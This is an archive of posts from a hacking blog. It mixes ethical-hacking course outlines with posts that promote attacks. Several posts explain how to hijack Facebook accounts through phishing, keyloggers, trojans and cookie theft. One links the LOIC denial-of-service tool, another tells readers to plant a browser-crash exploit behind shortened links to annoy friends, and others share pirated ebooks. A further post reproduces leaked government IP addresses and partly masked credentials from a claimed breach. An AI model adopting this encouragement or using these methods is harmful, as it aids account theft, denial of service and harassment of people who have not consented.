Black Hat hacker, Black Hat Hacking, White Hat and Black hat hacking tutorials

Ethical Hacking - An Overview of Ethical Hackers

2012-01-26T12:21:00.000+04:30

Ethical hacker is usually an expert in hacking hired by corporate world especially using vast computer network for its operation. The idea is always to legally allow testing of the operation network with the company for virtually every existing vulnerabilities. Basically ethical hacker shows which information within the computer network may be accessed by an illegal hacker or Black Hat Hacker; how the unauthorized retrieved information may be used by an illegal hacker contrary to the interest from the company. Further the hired hacker will be able to provide tools to alert whenever successful or unsuccessful hacking bid occurs.

Company hiring hacker for that security with their automatic data processing system should explain at length which data is crucial and where it has been kept. The hired hacker himself must have integrity beyond doubt since he can be permitted to access all, sensitive in addition to non-sensitive, on the company's database. Company should make sure to thoroughly go through the profile in the hacker prior to getting him for his services.

You can find definite signs of computing system being hacked. One of the most common sign is computer running very slow. In addition to which the computer system's hard drive could possibly have software that is unrecognizable. Now now you ask , how can illegal hacker accomplish his task of hacking?

For uploading and downloading of files, FTP shortly called FTP is use for many years. Many of the commercial systems have FTP server, if this is not configured properly with firewall software for security then hacker requires little effort to hack the machine. The FTP server may be used by hacker to store illegal software and files as part of your computer's disk space. The files usually stored are pirated movies, pornography, and cracked software. The script used in programming by hackers seriously isn't an uncomplicated one. It makes a directory structure in your metabolism which stores their illegal data. The normal user finds it too tough to remove these scripts off their system since they have extended extensions very hard to identify.

In the event that users are lucky enough to get know that their system is hacked, they might eradicate hacker's script by wiping out your complete system and then again reinstalling it. Oftentimes hacker use Internet Relay Chat (IRC). In many systems hackers install IRC relay agent in order that information can be extracted from host system without understanding of owner. The sole effect which might be experienced in the computer is lowering in performance and access to the internet becoming slow.

Another option that hacker uses commonly for destructive motive is peer-to-peer file sharing software. Any ADPS which utilizes peer-to-peer file sharing software for downloading of files from internet is liable being hacked. The anti virus software placed in the machine keep a check mark on any attempt of hacking and cautions the user whenever something non-standard is detected while downloading files inside the system by making use of peer-to-peer services. Any organization allowing utilization of peer-to-peer file sharing software packages are putting their system and network at riskly.

4 ways to hack facebook accounts

2012-01-23T20:21:00.000+04:30

4 approaches to The best way to hack facebook password/account ? I am going to cover 4 methods right here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack

Facebook phishing:

We've taken this kind of first because i believe this can be a hottest method/way involving hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The outcome of these surveys show "Phishing" as being the most used method to hack 'facebook' in order to note"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to prevent these Facebook phishers. Phishing not just allows you to hack "Facebook" but as well virtually any email account. You have to only have the trick used to create a phisher, which i think is quite easy. I learnt it without difficulty. But, remember, this really is only reserved for educational purpose. Let me not extend this topic up here when i have added on Phishing in my article How you can hack .facebook password

Keylogging:

This really is my second favorite, as only thing you need to do is remotely use a keylogger application (without having any physical having access to victim computer). Keylogging becomes more easy should you have physical entry to victim computer as only thing you want to do is purchase a keylogger and direct it for a destination so that it will point all recorded keystrokes to pointed destination. Such a keylogger does will it be records the keystrokes into a log file and you may utilize these logs to get required Facebook password and thus can hack. facebook password. We have posted detailed information involving top keyloggers inside the trade to read more see my Hacking section

Social engineering:

This sounds to get pretty not working at beginning. Even I used to be neglecting that way. But, once, I believed of using it against my pal on Facebook i got his Facebook password without difficulty with that method. I do think many involving you will be understanding how what this social engineering, For newbies, social engineering is method of retrieving password or answer involving security question simply be quering using the victim. You should be cautious while using the this as victim must not be aware involving your intention. Just talk about cautiously using your logic.

Primary email hack

If Facebook hacker, by some means, hacks your gmail or yahoo account which you are generally using as primary email address, than the Facebook hacker can certainly hack your Facebook password using "Forgot password" trick. He's going to simply ask Facebook to transmit password reset email for a primary email address contact info- and that is already hacked. Thus, your Facebook account password will likely be reset and this will be hacked !!!

So, try to remember to defend your Facebook primary email address contact information and then try to keep unknown or useless mail id as the primary email addressSo far, i came across these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I recently wanna allow you to be aware about Facebook dangers online. I will appreciate your effort if you mention some other Facebook hacking method.

Op Blackout - Anonymous pins down FBI and Justice Dept websites

2012-01-20T20:28:00.000+04:30

<== Operation Blackout ==>

After one of the most popular file hoster Megaupload goes down following the US Department of Justice's indiction of 7 people who ran it, Anonymous strikes back !

Indeed, the Megaupload 7 were tracked down the day after the Blackout of Wikipedia and other major websites happended in protest against SOPA and PIPA, two internet piracy bills to be passed in congress.

The Retaliation

Only 15 minutes after the indictment, The Black Hat Hacktivist group Anonymous launches a Massive DOS attack against 10 websites. Among those who became completely out of service are:

=> The Federal Bureau of Investigation (FBI)

=> The US Department of Justice

=> Universal Music Group

=> Recording Industry Association of America

=> Motion Picture Association of America

The Distributed Denial of Service
(DDOS) Attack

Anonymous is a collective group of hackers who come from different geographical locations but work together against designated targets. In this event, they communicated details of their target through their IRC channel #AnonOps. You can find more information on Anonymous group's operations and even tutorials on setting up softwares and required communication channels in order to help in their cause here:

Anonymous Hacker Group Website

The Software = ???

So you might be thinking..what the heck did those guys use to put down FBI's fucking website ???
The answer is LOIC => Low Orbit Ion Cannon.

LOIC is DOS applications developed to put enormous load on a target by continuously pining it. Used by thousands it becomes an effective DDOS which can put most servers down. An Anonymous rep sais that more than 5k users downloaded and used LOIC to flood the target websites.

Download LOIC

Anonymous Message - Don't Mess With Us

The secret to their Firepower

LOIC was initially a manually operated piece of software, but it eventually evolved and transformed itself into one which can be remotely operated. The LOIC program link that spreads across Anonymous's network is one which has been modified. It indeed can be pointed at an internet relay chat server and then be controlled by the Anon Admins to use your PC and internet connection to launch attack against the targets. So basically when installing the application, you become part of a botnet..the Anonymous Botnet and you give hackes the power to control your computer. That's their firepower..and considering the enormous amount of downloads that software has received..they got a lot of it !!!

Hacking Exposed Ebook - Web Applications 3

2012-01-18T01:23:00.001+04:30

From the world renowned series of ebooks related to computer security comes:

Hacking Exposed Web applications 3

So what this ebook is about ?

Web Applications are widely used on the internet today and are highly at risk from hackers and other malicious attackers. Web Applications Security therefore has become a must in the industry. Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures.

For the hacker:
Learn how to exploit holes in web applications using SQL Injections techniques.
Learn how tools like Maltego work.
Learn how to Hack into Web Authentication technologies.
Find vulnerabilities in ASP.NET, PHP, J2EE and other technologies used to make web apps.
Learn about how browser-based and client-side exploits work.
Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, Phishing, and XML Injection techniques.

Download Hacking Exposed Ebook Here

Making Money Online - When you do not hack

2012-01-15T03:05:00.001+04:30

Greetings Fellow Hacker and apprentices,
I have been surfing the net for years now and came across several Online Money Making programs, most of which did not work out. Of of those who did work out (PTC, Affialites ect...) most of them were not much remunerating..couple of bucks or $10 bucks per month.
Then I Found PostLoop.

Postloop is a marketplace and exchange for Forum Owners, Blog Owners, and Content Writers.

Forum owners can use Postloop to attract more posts to their forums,
Blog owners use Postloop to attract more comments to their blogs, and content writers use Postloop to earn money for posting in forums and commenting on blogs.

So you get it ? At Postloop you get paid to post. Forum and blogs owners pay so that poster like you and me come and post on their websites. In exchange they pay PostLoop and Postloop pays you.

I registered for their program and aside from maintaining the Black Hat Hacker blog, I make some bucks posting on forums. I make around $3 a day for now, but as your rating as a poster increases, so does your earning potential.
Postloop rates it's users by the quality of their post so if you have a decent grammar and good English, you should be able to make money online.

Click on the banner below to sign up free.

Ethical Hacking eBook - Hacking For Dummies 3rd Edition

2011-11-18T17:14:00.001+04:30

Looking for an easy way to start learning about ethical hacking ?
Then Hacking For Dummies (3rd Edition) is a must read. Containing about 411 pages, this ebook has been used by thousands of hackers around the globe to sharpen their penetration testing skills.

The Book adopts more the white hat way of hacking so that effective counter measures can be implemented agaisnt black hat hackers.After reading this, you will learn about the latest ethical hacking methods and how to protect your system against hacking attempts. The book is divided into seven main parts:
Part I - Building the Foundation of Ethical Hacking
Part II - Putting Ethical Hacking in Motion
Part III - Hacking The Network
Part IV - Hacking Operating Systems
Part V - Hacking Applications
Part VI - Ethical Hacking Aftermath
Part VII - The Part of Tens
Priced at about $15, the black hat hacker blog provides a link to download the eBook version for free. Enjoy ;)

Download Hacking For Dummies 3rd Edition

Black Hat Hacker Group - LulzSec

2011-11-07T02:37:00.001+04:30

The phenomenon of black hat hackers working on groups is well know. The most well known group must surely be Anonymous. This group gets all kind of media attention and hence causes other smaller groups but which merit significantly more showtime is the black hat hacker group "LulzSec"

LulSec is short for Lulz Security. This group consists of 6 core black hat hacker members, their goal seem to be have fun hacking and exposing the several security threats on the net. They d things apparently for the 'lulz' part of doing it, for the entertainment.

Operation Anti-Security
Operation Antisec, #Antisec or whatever you want to call it is perhaps one of the most mediated hacking operation ever. The two most famous: Anonymous and LulzSec teamed up to bring down and hack targets like Serious Organised Crime Agency (SOCA), Arizona Department of Public Safety and newspapers like The Post and The Times.

LulzSec and the FBI
After hacking Fox.com and leaking X-Factors contestants personal info, they hacked onto The American PBS system and even Sonny Pictures was not sparred. Now they are going big - FBI Affiliated Organisations. You can get more info on all their attacks on Wikipedia. I came across a video relating some interesting info about the group and FBI, you are welcome to take a look.

I hope you have as much fun as i did when finding more about the group.

Their Tweeter page: :http://twitter.com/#!/LulzSec
Download all their leaked/published documents: http://thepiratebay.org/user/LulzSec/
Their Last Release: http://pastebin.com/

Google Chrome and Firefox Crash Exploit

2011-11-04T14:33:00.000+04:30

Once in a while you come across people who just won't stop wasting your time on Facebook.
They just do not have anything else to do than to piss you off. In those time, you wish you could just disable that person's internet connection ! While this post won't show you how to do this, it will surely show you how you can piss off your friends by crashing their browsers.

I came across this exploit on the net devised by some hacker by the name of t3rm!n4t0r. The exploit can be found on the Exploit Database Website under the section DoS/PoC and with the name "Google Chrome Denial Of Service (DoS)".
The reason why the author call this a DoS is above my comprehension xD. It is just some javascipt code that crash the browser because the javascript code messes up with the memory of the browser. Still IT DOES CRASH THE BROWSER.

Download the exploit code here: Exploit Database

Affected Platforms: Windows and Unix

Affected Browsers: Chrome and Firefox

Tested on: Chrome v15 and Firefox v7

How to make it work ?
This exploit can be handy, so you may want it to be ready and and ur disposal.
I recommend uploading the code on a free web host.
(You have to save the code as an html file first)
Shorten the url of your free web host using goo.gl service or any other.
Just send them the url and watch them dissapear xD
Total Fun and they don't even know what hit them.
Happy Crashing.

Department of Defence, NASA, Pentagon and NSA have been hacked by hacker named Sl1nk

2011-05-15T16:16:00.005+04:30

The United States of America, Department of Defence (DoD).

Department of the Navy, the Pentagon, NASA and the National Security Agency(NSA)

All these security agencies are thought to have the best ever security put into place against hacker attacks...yet one claims to have hacked into them !!!

Hacker Pseudoname: Sl1nk

Organisation: Unknown

Reputation: Unknown

This guys claims to have done some quite interesting and unbelievable things..things that would mean that the security holes in these above mentioned agencies are countless..

Is that because they wanted to adopt cloud computing, we'll see that later.

Maybe what this hacker 'sl1nk' is claiming to have done is completely false..but the information he provided seems so precise that it becomes difficult to ignore them. There is a set of documents he presented as proof and which are available to view at the end of this post. For now take a look at the tricks he says he managed to pull:

SSH access to a Network of 140 machine's layer 1 to 3 in the Pentagon
Access to APACS (automated personell air clearance system)
Thousand's of documents ranging from seizure of a vehicle up to private encryption key request forms.
Database of all usernames/passwords of Webmail of Nasa.
Access to ASSIST (Database for Military Specifications and Military Standards)
Data Transformation Corporation's FAA Sponsored DUAT Service
Access to Government Gateway at http://www.gateway.gov.uk/
Access to applicationmanager.gov
Login access to HM Revenue & Customs (HMRC)
Login to Central Data Exchange | US EPA

As you can see, he (sl1nk) claims to have SSH access to many boxes, a list is given below :-

Pentagon, Nasa, Navy, NSA	Area 54	Department of the Navy, Space and Naval Warfare System Command
64.224.0.11	207.60.16.0 - 207.60.16.255	205.0.0.0 - 205.117.255.0
IP=64.224.0.5
64.70.0.2,
64.70.1.15
64.70.2.53
64.70.2.95
131.182.3.72
153.31.1.195
64.70.2.16
128.149.2.1
64.224.0.9 and lots more

He also presented some account credentials that suppozedly THN Team verified and documents originating from the Department of Defence (DoD).

https://assist.daps.dla.mil/

User: COM502571

Pass: C*************g@@

--------------------------------------------

http://www.duat.com

system access code: 0016***9

password: F*****1

--------------------------------------------

http://www.gateway.gov.uk/

Agent Name: Corie Lee

User ID: 1152****652

Pass: **************

--------------------------------------------

https://online.hmrc.gov.uk/account

Your User ID is: 437067167597

Password: cl**********3d

--------------------------------------------

https://applicationmanager.gov/

User: administratorbackup

Pass: fu********l@

--------------------------------------------

https://cdxnode64.epa.gov

User: JCrimson

Pass: M*********0n

--------------------------------------------

https://pecos.cms.hhs.gov/pecos/login.do

User: Adminbackup

Pass: g*********7

Nice proofs and for sure would make people believe that these agencies have security flaws..but to what extent is it true ?

Was it because they moved to cloud computing...but why our defense and intelligence agencies are moving so quickly to adopt cloud computing ?

The answer is cost savings and higher efficiency but the most important aspect is is grounded squarely in our DoD's need exploit information faster than its adversaries.

Cloud computing is unique in its ability to address critical defense and intelligence mission needs. That’s why cloud computing is critical to national defense.

The main concerns surrounding Cloud Computing Security are:

Data security, privacy and integrity

Intrusion detection and prevention

Security concerns about Cloud Computing are nothing new

Security experts find flaws in cloud computing

Demonstrations of new ways to attack corporate data stored with the increasingly popular “cloud” services have added to concerns about the technology.
Security researchers at the Black Hat USA security conference in Las Vegas showed how users of Amazon’s Elastic Compute Cloud (EC2) services were tricked into using virtual machines that could have included “back doors” for snooping.

XerXeS DoS - Wikileaks Hacking Tool

2010-12-10T20:54:00.007+04:30

XerXes

DoS Attack Video Part 2

The Hacking tool used to DoS Wikileaks

This is demonstration of a XerXes DoS Attack in action against atahadi.com

Whats new from the first demo video is that more is revealed about the attack technique.

See for yourself :

Activate FullScreen for a better experience

Click on this link to view the first video

This second video of XerXeS shows more of the XerXeS dashboard, and reveals even more about the attack technique – It's an Enhanced version of XerXes able to dos secured Apache servers !

Take a look at 02.25 when he sets up the target server:

XerXes can now affect multiple server flavors – some still more are under development.

This time he dropped a Secured server which is supposed have the Apache setup that is impervious to a XerXeS hit.

Denial of Service (DoS) Attacks

The basic premise to this attack is that by sending (but never fully completing) numerous requests to Apache, one could get the Apache process to consume all system resources and stop serving up the actual web content.

Exploitation

The Apache vulnerability is only the beginning, Xerxes will be able to hit IIS in the future.

DoS or DDoS ?

The attack is performed on a single low-spec computer, and while The Jester sends relatively few packets from his own machine, the attack results in brief outages of the target site.

So he is not using any intermediaries or botnets, sorry for having wrote DDoS in my first post xD

You can view part 1 here: XerXes in action

You surely can follow Jester here:

http://twitter.com/th3j35t3r

Hackers attack Mastercard

2010-12-08T22:58:00.001+04:30

OPERATION PAYBACK

If you tried going to MasterCard’s web site this morning you might have found yourself waiting a long time. Hackvists Hackers supporting WikiLeaks founder Julian Assange claim to have taken down the website of MasterCard, which shutdown its payment service to the controversial website on Monday.

The hacktivist group dubbed Anon_Operation said in one tweet that "www.mastercard.com/ is down" and designated mastercard.com as their "current target" in what was taking the proportions of cyber war.

WikiLeaks has benefited from a massive groundswell of online support. Twitter is choked with messages of solidarity. The site's Facebook page has 1 million fans. And tech-savvy supporters are organizing boycotts and other stunts.

Operation:Payback occurs after the credit-card company withdrew its funding services for WikiLeaks. The whistleblower Web site’s founder Julian Assange was arrested yesterday and denied bail. He remains in the custody of British police.

View our previous post to see Xerxes, the tool used to ddos Wikileak, in action. A tool able to make a distributed denial of service attack, created by the jester...

Wikileak Xerxes Dos Attack

2010-12-06T15:28:00.002+04:30

Want to have a look at the tools which Jester (the one who did a Ddos distributed denial of service) attack against Wikileaks ? Here you go :

Xerxes in Action

The tool used to Ddos Wikileak

Activate FullScreen for a better experience xD
and
View the preceding post to get the full story xD

Wikileaks hacked - Mass Distributed Denial of Service (ddos) attacks

2010-12-06T00:03:00.006+04:30

Wikileaks under mass distributed denial of service attacks

Wikileaks, the famous whistle blower website has attracted high attention after publishing confidential information otherwise not available to the public.in April 2010, WikiLeaks posted video from a 2007 incident in which Iraqi civilians and journalists were killed by U.S. forces, on a website called Collateral Murder. In July of the same year, WikiLeaks released Afghan War Diary, documents about the War in Afghanistan not previously available for public review.

Just recently, Wikileaks says it is the target of a computer-hacking operation, ahead of a release of secret US documents.

DDOS (Distributed Denial of Service)

Distributed denial-of-service attack (DDoS attack)

In short: Distributed Denial of Service, or DDoS. A group of computer users or an organization distributed across multiple systems floods the host's servers with spurious requests for access,

Is showed in the below graph, traffic to one of Wikileak’s primary hosting provider> At approximately 10:05am EST, traffic abruptly jumps by 2-4 Gbps as the attack begins.

The attack was "exceeding 10 Gigabits a second"

Another way to think of it is that someone, somewhere is demanding that the WikiLeaks cablegate site deliver the equivalent of 114 movies per second
.
That's a massive attack, but it's not as big as some it has survived in the past. So why did it have so much trouble today?

Amazon dropped it
On 2 December 2010 Amazon.com severed its ties with WikiLeaks, to which it was providing infrastructure services, after an intervention of an aide of US Senator Joe Lieberman. Amazon denied acting under political pressure citing a violation of its terms of service. Fuck !
DNS too (Dynamic Network Services Inc.)
On 2 December 2010 American owned EveryDNS dropped WikiLeaks from its entries, citing DDoS attacks that "threatened the stability of its infrastructure".The site's 'info' DNS lookup remained operational at alternative addresses for direct access respectively to the Wikileaks and Cablegate websites

The Hacker who took it down (The Jester)

th3j35t3r

So who is this hacker?

The hacker, who calls himself The Jester and goes by the name th3j35t3r on Twitter, said he was motivated to take down WikiLeaks for patriotic reasons. He also said his other targets include Web sites used by Al Qaeda and other terrorists groups for recruiting purposes.

What he used? - XerXeS

He apparently developed a multi-thread, thin-client denial of service attack application that effectively allows him to launch a distributed denial of service (DDOS) attack on a website from a single linux server.

The everal interviews with The Jester, along with two videos he made for Infosec Island that demonstrate the XerXeS Dos attack in action.

Hacking Website : Training for hackers to hack websites

2010-08-05T10:25:00.000+04:30

Hi there, all of you who come here to know how to hack a website have come to the right place. Hack-website.blogspot.com is the place to visit if you wants loads of information on website hacking. Further post wil be added about this but first lets start with a little bit of training. To get the basics of website hacking, you must understand how all these things work: webservers, web pages, vulnerabilities and sql injection. I will cover these parts later but for beginners i would recommend to sign up at hackthissite.org. This is the best place to start learning what is essential to hacking websites.

Certified Ethical Hacker Training Videos

2010-07-01T11:44:00.000+04:30

The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

So here you go with 13.52GB of Certified etical hacker training.

Download Certified Ethical Hacker Training Videos

Certified Ethical Hacking Training - CEH Overview

2010-05-20T16:02:00.000+04:30

Hacking involves creativity and thinking 'outside-of-the-box', that is why vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organisations have adequately protected their information assets, they must adopt the approach of 'defence in depth'. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure.

The goal of the Ethical Hacking & Countermeasures Course is to teach a delegate to help his organization to take pre-emptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits. Delegates should be prepared for action paced course and the sheer size of the course content, however do not be intimidated as we will release e-learning prior to the delegate attending the course and also the instructor will prepare them thoroughly for the Certification Examination, the maunuals can then be taken home and to work and can be used as excellent reference volumes.

EC-Council Certified Ethical Hacker Certification: EC-Council has successfully certified more than a thousand information security professionals. CEH examination is becoming more demanding and more effective in measuring the true skills of a Penetration tester. Students are now required to be able to interpret identify exploits, log files, identify attack signatures, recommend countermeasures, have a firm grasp of the main tools and know standard procedures involved in penetration testing. The student is tested on 150 questions picked randomly from a pool of questions contributed by the security community. Our Pass rate to date is 98%

Who Should Attend? This course will significantly benefit security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network and enterprise security.

Module 1: Introduction to Ethical Hacking

Why Security?
The Security, functionality and ease of use Triangle
Can Hacking be Ethical?

Module 2: Footprinting

Defining Footprinting

Module 3: Scanning

Definition of Scanning.
Types of scanning

Module 4: Enumeration

What is Enumeration?
NetBios Null Sessions

Module 5: System Hacking

Administrator Password Guessing
Manual Password Cracking Algorithm
Automated Password Cracking

Module 6: Trojans and Backdoors

Effect on Business
What is a Trojan?

Module 7: Sniffers

Definition of sniffing
How a Sniffer works?

Module 8: Denial of Service

What is Denial of Service?
Goal of DoS(Denial of Service)

Module 9: Social Engineering

What is Social Engineering?
Art of Manipulation

Module 10: Session Hijacking

Understanding Session Hijacking
Spoofing vs Hijacking
How Web Servers Work?

Module 11: Hacking Web Servers

How are Web Servers Compromised?

Module 12: Web Application Vulnerabilities

Web Application Set-up
Web Application Hacking

Module 13: Web Based Password Cracking Techniques

Authentication- Definition
Authentication Mechanisms
HTTP Authentication

Module 14: SQL Injection

Attacking SQL Servers
SQL Server Resolution Service (SSRS)

Module 15: Hacking Wireless Networks

Introduction to Wireless Networking
Business and Wireless Attacks

Module 16: Virus

Virus Characteristics
Symptoms of 'virus-like' attack

Module 17: Physical Security

Security statistics
Physical Security breach incidents

Module 18: Linux Hacking

Why Linux?
Linux basics

Module 19: Evading Firewalls, IDS and Honeypots

Intrusion Detection Systems
Ways to Detect Intrusion

Module 20: Buffer Overflows

Significance of Buffer Overflow Vulnerability
Why are Programs/Applications Vulnerable?

Module 21: Cryptography

Public-key Cryptography
Working of Encryption

Module 22: Penetration Testing Course

Introduction to Penetration Testing (PT)

Module 23: Advanced Exploit Writing
Module 24: Advanced Covert Hacking TechniquesModule 25: Advanced Virus Writing Techniques
Module 26: Advanced Reverse Engineering Techniques

Security training - Certified ethical hacker certification

2010-05-14T15:08:00.005+04:30

"To beat a hacker, you need to think like one".

With the increasing security threats to computer networks and web servers, there is a great need to make networks "hacker-proof". Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks within 20 minutes.The best way to do this is by understanding the methods employed by hacker's to intrude into systems.

The objective of the ethical hacker is to help take preventive measures against hacking attempts by attacking the system himself; all the while staying within legal limits. This philosophy stems from the proven practice of trying to catch a thief, by thinking like a thief. Ethical Hacking and Countermeasures course mission is to educate, introduce and demonstrate hacking tools for penetration testing purposes only. As technology advances and organization depend on technology increasingly, information assets have evolved into critical components of survival.

The Certified Ethical Hacker Certification certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker Certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

Some of the topics covered in ethical hacker certification:

    Penetration Testing Methodologies
    Network Protocol Attacks
    Network Reconnisannce
    Vulnerability Identification
    Windows Exploits
    Unix/Linux Exploits
    Covert Channels & Rootkits
    Wireless Security Flaws
    Web Application Vulnerabilities
    Business and Technical Logistics of Penetration Testing
    Information Gathering
    Linux Fundamentals
    Detecting Live Systems
    Reconnaissance -- Enumeration
    Cryptography
    Vulnerability Assessments
    Malware – Software Goes Undercover
    Hacking Windows
    Advanced Vulnerability and Exploitation Techniques
    Attacking Wireless Networks
    Networks, Firewalls, Sniffing and IDS
    Injecting the Database
    Attacking Web Technologies

Listed below are some of the Ethical hacker certifiying bodies:

CEH - Certified Ethical Hacker by EC Council - http://www.eccouncil.org/

CPT - Certified Penetration Tester - http://www.iacertification.org/cpt_certified_penetration_tester.html

Hacker training - Great Hacking tutorials 2010

2010-05-14T14:33:00.002+04:30

That is the best ever hacking tutorials of 2010 combined altogether to give hackers an edge.
Great hacker training articles, tutorials and courses covering vast areas of hacking like

More Hacking/The Greatest Hacker of all time
More Hacking/The Hacker’s League
More Hacking/The Inner Circle Book’s Hacking Techniques
More Hacking/The Lamahs-Guide to Pirating Software on the Internet
More Hacking/The M.M.C. Guide to Hacking, Phreaking, Carding
More Hacking/The National Information Infrastructure-Agenda for Action
More Hacking/The Newbies Handbook- ‘ How to beging in the World of Hacking
More Hacking/The Newbies-User’s Guide to Hacking
More Hacking/The Pre-History of Cyberspace
More Hacking/The Price of Copyright Violation
More Hacking/The REAL way to hack RemoteAccess
More Hacking/The Secret Service, UUCP,and The Legion of Doom
More Hacking/the UNIX operating system (Berkley 4.2)
More Hacking/Theft of Computer Software-A National Security Threat
More Hacking/Thoughts on the National Research and Education Network
More Hacking/Tips on Starting Your Own BBS.1
More Hacking/undocumented DOS commands
More Hacking/UNIX Computer Security Checklist
More Hacking/UNIX Use and Security – By the Prophet
More Hacking/UNIX Use and Security From The Ground Up
More Hacking/UNIX- A Hacking Tutorial.SIR
More Hacking/Viruii FAQ
More Hacking/Virus-Trojan FAQ
More Hacking/What Files are Legal for Distribution on a BBS
More Hacking/What To Look For In A Code Hacking Program
More Hacking/What To Look For In A Code Hacking Program
More Hacking/What You Should Know About Computer Viruses

Download: 6.51 MB

http://hotfile.com/dl/31001788/16b3263/1000_Hacking_Tutorial.rar.html

Mirror

http://rapidshare.com/files/358355536/1000_Hacking_Tutorial.rar

Certified ethical hacking course

2010-05-14T13:38:00.004+04:30

A little note about EC Council Exam 312 50

For ethical hacker certification, EC council is perhaps one of the best certification body that provides regognised hacker certification in the world. Lets take a closer look at the EC Council exam courseware.

Ethical Hacking and Countermeasures EC Council Exam 312 50 Student Courseware

By explaining computer security and outlining methods to test computer systems for possible weaknesses, this guide to system security provides the tools necessary for approaching computers with the skill and understanding of an outside hacker. A useful tool for those involved in securing networks from outside tampering, this guide to CEH 312-50 certification provides a vendor-neutral perspective for security officers, auditors, security professionals, site admistrators, and others concerned with the integrity of network infrastructures. Complete coverage of footprinting, trojans and backdoors, sniffers, viruses and worms, and hacking Novell and Linux exposes common vulnerabilities and reveals the tools and methods used by security professionals when implementing countermeasures.

Download Now

Hacker training - hacking ebook : The art of exploitation

2010-05-14T13:29:00.003+04:30

This is a fine hacking book that every hacker should have.
Learn hacking by reading this hacking book considered one of the best hacker resource on the web

The Art of exploitation

This marvelous piece of information introduces the hacker to the spirit and theory of hacking as well as the science behind it in a step by step method of learning which proves to be very effective. It begins at the basic level and jumps to the core hacking techniques and tricks and you can then start to think like a hacker. Essential and elemental techniques that hackers and security professionals use are here well described and discussed which helps the user to gain a real insight of the hacking world. The course also covers network traffic sniffing and manipulation as well as a cryptography section.

Facebook new security flaw unveiled - Open graph

2010-05-12T09:18:00.003+04:30

Facebook is again the victim of a security breach. It was necessary to wait six years and more than 400 million registered members for the vulnerabilities of social network to be finally unveiled. The site has fixed a flaw in its website customization system based on the Open graph. It allowed to retrieve location data of a user.

A closer look and we find that the fault was based in an option of using the Facebook site for Internet Yelp recommendations. Techcrunch says that Yelp is one of three sites chosen by Facebook to test its function of "instant custom" with Pandora and Docs.com. Therefore, if a user connects to one of these sites, Facebook provides a way encrypted personal data so that his visit is personalized.

However, malicious code could be injected via the method of cross-site scripting. All this information prior Figures were visible to an attacker. It was even possible to recover the encryption key and thus benefit from all the information on the Internet.
Still, if the fault has been corrected in less than two hours, it leaves a gaping doubt about the capabilities of Facebook to preserve the identities of Internet users. It should be noted that the site of Mark Zuckerberg is destined to share the email addresses of its users to third party sites. It could be that companies wish to eventually use this valuable information. Unless a wave of unsubscriptions're right social network ...

How to hack a facebook account - hack a facebook account

2010-04-28T14:18:00.002+04:30

How a facebook account can be hacked

Facebook is one of the most widely used Social Networking website by many across the world . Most of them are now a days making the fake accounts both for abuse or maintaining secret relations. So, it’s no wonder that many people have started to devise methods to hack a Facebook account.
Now i will show you some of the working and best ways to hack a Facebook account
Now a days the security standards are greatly increased even the brute force attacks don’t work don’t get fooled there are so many people who try to fool the people by telling them to hack Facebook and any other service like orkut ,gmail,yahoo, orkut, there are only a few ways to get that account and the easiest relies on the ignorance of the user. The hardest relies on the skill of the hacker…
Starting with the easiest…and going to the rare and intermediate hacks

#Using a Keylogger
The hacker sends a client keylogger software that captures everything the user types in, including passwords. The captured keysrokes are sent by email, FTP or sare stored on the victim’s computer for later removal.
Counter : Use a firewall and don’t accept suspicious programs(specially when they are light) Using a virtual keybord also helps.

#Using a Trojan
This is same as the keyloggers if u want more control over the victom then u can use Trojans (Rats) these are remote administrator tools which give the complete control over the victim system. Relies fully on whether the user accepts the infected file or not. Trojans are quickly detected by antivirus software but packing the Trojan can get around that. Trojans or Rats can also be binded with legitimate software using exe binders.
Counter : Antivirus and Suspicion. Trojan also generate a lot of network activity when operating, so it is easy to spot them. Firewalls also work gr8.

#Phishing
PHISHING is the most commonly used method to hack into any web based systems like orkut ,gmail ,yahoo.
Phishing is proved the best and easy way to hack into any web based system u can even hack into Facebook it has high success rate . And also there is no need of any scripting knowledge like html just upload the page to any free hosting accounts and send the link to the victim. It works by creating a copy of a Login page (facebook login) ,changing some stuffs in it so as it emails the input username and password to the hacker and redirect to the REAL Facebook login page after so as the user does not get a hint of what is happening. Once the user has input his credentials, they are sent as plain text to the hacker.
Counter: The fake login page usually have to be hosted somewhere and must have a domain name. Naturally it cannot be the same as login.facebook.com so check for the URL when you are login in.

#Metasploit
I personally hate this tool. Won’t talk much about it.. damn automatic hacker
The attacker just needs the victims IP and some skill to pull the attack. So don’t just give out your Ip and don’t download stuffs from Instant Messengers as it is in this way that the attackers obtain the ip address. Beware also of emails containing strange link as clicking on a link can send your IP adrress to the hacker.

#Cookie Stealing
Involves using an exploit to steal session cookies which when injected into the hackers session (cookie injection), gives him access to your facebook account without needing to input your password. But that limits the damage he can do.
A > Downloads the HomePage.
B > Allows you to the Target’s Wall and
C > Retrieve your Target’s Friend’s List

The hacker needs your IP, skills and skills.
A software I heard that can give you control of a facebook account is FBcontroller. You have to feed it the live cookies of a victim and it does the rest.
You can get the target’s cookie by sniffing, XSS, amusing engineering, ARP Poison-Sniffing, Scroogle chase or about you like.

Facebook rh hack tool - facebook hacking tool

2010-04-28T14:12:00.002+04:30

